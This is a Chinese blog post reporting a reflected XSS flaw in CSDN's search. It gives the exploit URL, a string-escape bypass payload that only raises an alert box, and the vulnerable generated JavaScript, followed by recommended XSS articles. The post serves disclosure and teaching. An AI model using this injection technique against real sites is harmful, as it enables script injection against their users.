CSDN 存在反射型 XSS 漏洞

最新推荐文章于 2025-05-10 10:52:49 发布
原创 最新推荐文章于 2025-05-10 10:52:49 发布 · 569 阅读 · 1 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-NC-SA 版权协议,转载请附上原文出处链接和本声明。
标签
#CSDN #XSS
本文分析了CSDN网站上存在的XSS漏洞,详细解释了漏洞产生的原因及利用方式。通过构造特定payload,攻击者可注入恶意脚本,影响网站安全。

原文链接:https://www.sanphantom.com/?p=307

CSDN XSS 漏洞

利用地址

https://so.csdn.net/so/search/s.do?q=%5C%22%3B+alert%281%29+%2F%2F&t=doc&o=&s=&l=&f=

playload

\"; alert(1); //

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fSZC6XBZ-1571581083214)(https://i.loli.net/2019/10/20/fx1K8mzXawVNDCj.png)]

存在原因

动态生成 JavaScript 代码存在转义纰漏。通过查看源代码发现源码中有如下代码:


    var blogUn = "";
    var ty = "doc";
    var isVip = "0";
    var blogRequsetId="";
    var downloadRequsetId="157158021819726861934582";
    var askRequsetId="";
    var bbsRequsetId="";
    var eduRequsetId="";
    var gitchatRequsetId="";
    console.log("blogRequsetId:"+blogRequsetId+",downloadRequsetId:"+downloadRequsetId+",askRequsetId:"+askRequsetId
    +",bbsRequsetId:"+bbsRequsetId+",eduRequsetId:"+eduRequsetId+",gitchatRequsetId:"+gitchatRequsetId);
    
    //从博主过来的搜索
    if (blogUn != "") {
        if ($('.search-list-con').find('.J_search').length <= 0) {
            $("#nodata").show()
            // $('.baidu_img').hide()
        }
    }
    var queryword = "\\"; alert(1) //";
    var userObj = "";
    if ("" != "") {
        userObj = eval('(' + "" + ')');
    }
    if (!blogUn && ty == '') {
    }
    $("#keyword").val(queryword);
    $("#keyword1").val(queryword);
    $("#relateSearch").text(queryword);
    $("#csdnSearch").text(queryword + "- CSDN搜索");
    var isContainBaidu = "0";
    // console.log('queryword===',queryword)
    var newqueryword = encodeURIComponent(queryword)
    if (isVip != "1" || isVip == "0") {
        // 不是免广告的才会
        $.ajax({
            type: 'GET',
            url: 'https://kunpeng.csdn.net/ad/list?positions=470,471,472,473&contentKey=' + newqueryword,
            dataType: 'json',
            success: function (result) {
                console.log('鲲鹏流量分发接口返回====', result)
                if (result && result.length) {
                    //  console.log(ty,'ty======')
                    if (!blogUn && ty == '') {
                        // 来自全部
                        // console.log('来自全部====')
                    } else {
                        // 其他页卡填充 第一条放广告
                        if ((ty && ty !== 'course') && (ty && ty !== 'gitchat') && (ty && ty !== 'discuss') && (ty && ty !== 'doc') && (ty && ty !== 'ask')) {
                            if (result[0] && result[0].status) {
                                //console.log('result[0].con===',result[0].con)
                                var firstDom = $(".J_search")[0];
                                $(firstDom).before(result[0].con)
                            }
                        }
                    }
                    // 第3条后面插入广告 第8条后面插入广告 第13条后面插入广告
                    // 对于首页来说没有J_search 则是 第4 9 14 后面插入广告
                    if (ty !== 'course' && ty !== 'gitchat' && ty !== 'ask') {
                        if (result[1] && result[1].status && $(".J_search").length >= 3) {
                            $($(".J_search")[2]).after(result[1].con)
                        }
                        if (result[2] && result[2].status && $(".J_search").length >= 8) {
                            $($(".J_search")[7]).after(result[2].con)
                        }
                        if (result[3] && result[3].status && $(".J_search").length >= 13) {
//                         console.log('result[3].con===',result[3].con)
                            $($(".J_search")[12]).after(result[3].con)
                        }
                    }
                }
            }
        });
    }

重点在生成的这一句代码:

var queryword = "\\"; alert(1) //";

\"; alert(1) // 为我们所构造的 playload

不难发现原本代码是将 " 进行了 \" 转义,但是如果我在 \ 前再进行一次转义的话就可以构造一个完整的字符串。这样后面就编写我们自己的脚本了。但是原有代码后面始终会有一个 " 作为结束,为了使代码不报错且能正常运行,可以构造一个双斜杠来将后面的代码注释掉。

XSS漏洞
04-05
NULL 博文链接:https://0001111.iteye.com/blog/1440168
XSS漏洞洞讲解
Wincreds的博客
08-17 3176
XSS跨站脚本攻击(Cross-Site Scripting, XSS)是一种常见的网络安全漏洞,它允许攻击者在其他用户访问的网页中注入恶意脚本。XSS 攻击的主要目标是通过在受害者的浏览器中执行恶意代码来窃取敏感信息、篡改网页内容或劫持用户会话。
快速找出网站中可能存在XSS漏洞实践(一)
weixin_34138521的博客
08-21 1026
一、背景 笔者最近在慕课录制了一套XSS跨站漏洞 加强Web安全视频教程,课程当中有讲到XSS的挖掘方式,所以在录制课程之前需要做大量实践案例,最近视频已经录制完成,准备将这些XSS漏洞的挖掘过程记录下来,方便自己也方便他人。 在本篇文章当中会一permeate生态测试系统为例,笔者此前写过一篇文章当中笔者已经讲解如何安装permeate渗透测试系统,因此这里不再重复讲解如何安装此渗透测试系统,...
Web安全之XSS漏洞
我不是大牛
07-04 2641
同源策略 同源策略(Same-Origin Policy),就是为了保证互联网之中,各类资源的安全性而诞生的产物,它实际上是一个众多浏览器厂商共同遵守的约定。同源策略是浏览器中最基本的安全功能。缺少同源策略,很多浏览器的常规功能都会受到影响,可以说Web是构建在同源策略基础之上的。 如果Web世界没有同源策略,当你登录FreeBuf账号并打开另一个站点时,这个站点上的JavaScript可以跨域读...
常见Web十大漏洞,常见Web漏洞
qq_22792465的博客
07-27 9570
参考:https://blog.csdn.net/weixin_43376075/article/details/105189017https://blog.csdn.net/qq_43168364/article/details/105595532https://www.cnblogs.com/-qing-/p/10819069.html代码执行函数:1- eval()#传入的参数必须为PHP代码,既需要以分号结尾。比如从指定URL地址获取网页文本内容,加载指 定地址的图片,下载等等。
XSS | 反射型 XSS 攻击
Blue17 の 小窝
09-27 4206
当目标用户访问该链接时,服务器接收该目标用户的请求并进行处理,然后服务器把带有 XSS 代码的数据发送给目标用户的浏览器,浏览器解析这段带有 XSS 代码的恶意脚本后,就会触发 XSS 攻击。为了方便演示,笔者给 2.0 还是设置了弹窗(保留了弹窗功能才让你知道你被攻击了),点击了弹窗的确认后,会弹出啥,笔者这里就不截图了,怕过不了审,留给读者自己摸索吧。此时,有宝子又会说,你这太明显了,点了 ”确定“ 后又是一个 404 Not Found,而且 URL 这么怪,是个人都能发现这个链接有猫腻,马上举报!
XSS | XSS 漏洞介绍
Blue17 の 小窝
09-26 2327
跨站脚本(Cross-Site Scripting,简称为 XSS)攻击,是一种针对网站应用程序的安全漏洞进行攻击的技术,是代码注入的一种。它允许恶意用户将代码注入网页,其他用户在浏览网页时就会受到影响。这些恶意网页程序通常是 JavaScript,但实际上也可以包括 Java、VBScript、ActiveX、Flash 或者甚至是普通的 HTML。恶意用户利用 XSS 代码攻击后成功后,可能得到很高的权限(如执行一些操作)、私密网页内容、会话和 Cookie 等各种内容。
Web安全:XSS漏洞的测试(防止 黑客利用此漏洞.)
网络安全领域___专研者.
03-17 2万+
XSS漏洞的概括: XSS又叫CSS(Cross Site Script)跨站脚本攻击,指的是攻击者在Web页面,插入恶意JS代码,当用户浏览该页之时,嵌入其中JS代码就会被执行,从而达到攻击的目的.(包含:收集用户的Cookie,添加账号,修改密码,提高用户权限等等.)
一次反射型XSS漏洞发现的过程
qq_33163046的博客
09-09 1304
通过此次对反射型 XSS 漏洞的发现过程,即使有专业的安全扫描工具辅助,漏洞的确认也并非一蹴而就,需要进行多轮的尝试和验证。在本次漏洞发现中,我们首先借助安全扫描工具确定了疑似漏洞区域,然后通过手动修改报文进行测试。在尝试多种 payload 后,最终通过编码绕过的方式成功触发了漏洞,验证了反射型 XSS 漏洞存在。这一过程提醒我们,开发人员在构建网站和应用程序时,必须高度重视用户输入的验证和输出的编码,以防止恶意脚本的注入。
[ pikachu ] 靶场通关之 XSS (二) --- 反射型 XSS 之 get 型
qq_51577576的博客
01-14 2911
???? 博主介绍 ????‍???? 博主介绍:大家好,我是_PowerShell,很高兴认识大家~ ✨主攻领域:【渗透领域】【数据通信】 【通讯安全】 【web安全】【面试分析】 ????点赞➕评论➕收藏 == 养成习惯(一键三连)???? ????欢迎关注????一起学习????一起讨论⭐️一起进步????文末有彩蛋 ????作者水平有限,欢迎各位大佬指点,相互学习进步! 目录 ???? 博主介绍 一、反射型xss(get) 二、过关: 1. 页面 2. 首先确认一下这个页
XSS注入之xss-labs
m0_60716947的博客
05-02 3740
(一)配置环境 (1)phpstudy 的安装 这里可以去看看我写的另外一个文章 SQL注入之sqli-labs_清丶酒孤欢ゞ的博客-CSDN博客 这里面详细的讲了phpstudy的安装与搭建。 (2)xss-labs 的安装 mirrors / do0dl3 / xss-labs · GitCode 点击克隆里面的下载源码,随便选一个形式,然后将文件解压到 phpstudy 下的www 目录下 打开 phpstudy 中的 apache ,在浏览器中输入 127.0.0.1/xss-lab
渗透测试基础-反射型XSS原理及实操
liuhyusb的博客
04-01 1568
XSS的防护方法和注入也一样,过滤为主,将尖括号和单双号引号都进行实体编码了,这里就不存在XSS了。《最好的防御,是明白其怎么实施的攻击》
【网络安全---XSS漏洞(1)】XSS漏洞原理,产生原因,以及XSS漏洞的分类。附带案例和payload让你快速学习XSS漏洞
m0_67844671的博客
10-04 6594
一篇文章告诉xss是什么?原理,产生原因,分类以及一些案例
第十课 反射型XSS漏洞和防御
yy1715713348的博客
03-25 766
反射型XSS漏洞由于这种漏洞需要一个包含Javascript的的请求,这些请求又被反射到提交请求的用户,所以成为反射型XSS实例:动态页面向用户显示消息xxx.com/error.php?判断 xxx.com/error.php?
XSS注入
最新发布
Pudding_2024的博客
05-10 2456
跨站脚本(Cross-Site Scripting,XSS/CSS)是一种经常出现在Web应用程序中的计算机安全漏洞,是由于Web应用程序对用户的输入过滤不足而产生的。攻击者利用网站漏洞把恶意的脚本代码(通常包括HTML代码和客户端javascript脚本)注入到网页之中,当其他用户浏览这些网页时,就会执行其中的恶意代码,对受害者可能采取Cookie资料窃取、会话劫持、钓鱼欺骗等各种攻击。本质:前端代码注入XSS的分类1、反射型XSS
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
热门推荐
Martin-share的博客
02-12 2万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
DVWA-反射型XSS漏洞
Drink_J的博客
03-20 707
(一)将DVWA的级别设置为low 1.1 查看源代码,没有对参数做任何过滤,直接输出 1.2尝试一般的XSS攻击 ①输入 window.location用于获得当前页面的URL,并把浏览器重定向到新的页面 iframe作用是文档中的文档,将原页面变为一个长和宽为0的网页 ![在这里插入图片描述](https://img-blog.csdnimg.cn/20200320172629582.pn...
xss跨站漏洞总结
ajjsjd的博客
09-22 1137
1.cookie是显示在你客户端的验证信息,而session则是存储发服务器的信息。通过xss漏洞只能获取网站的cookie,而无法获取session。一些网站有时会是session验证,获取cookie也没用。在当前阶段的学习,感觉就是对xss的一些基本漏洞类型,和一些简单的绕过进行学习。一些靶场和ctf的题目也是针对这个。但实战中的xss漏洞很多就会有钓鱼网站等。就比如xss结合msf,在你访问我的网站时,跳出个弹窗说什么flash版本过低,让你下载,而跳转的页面中就已经植入了木马。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值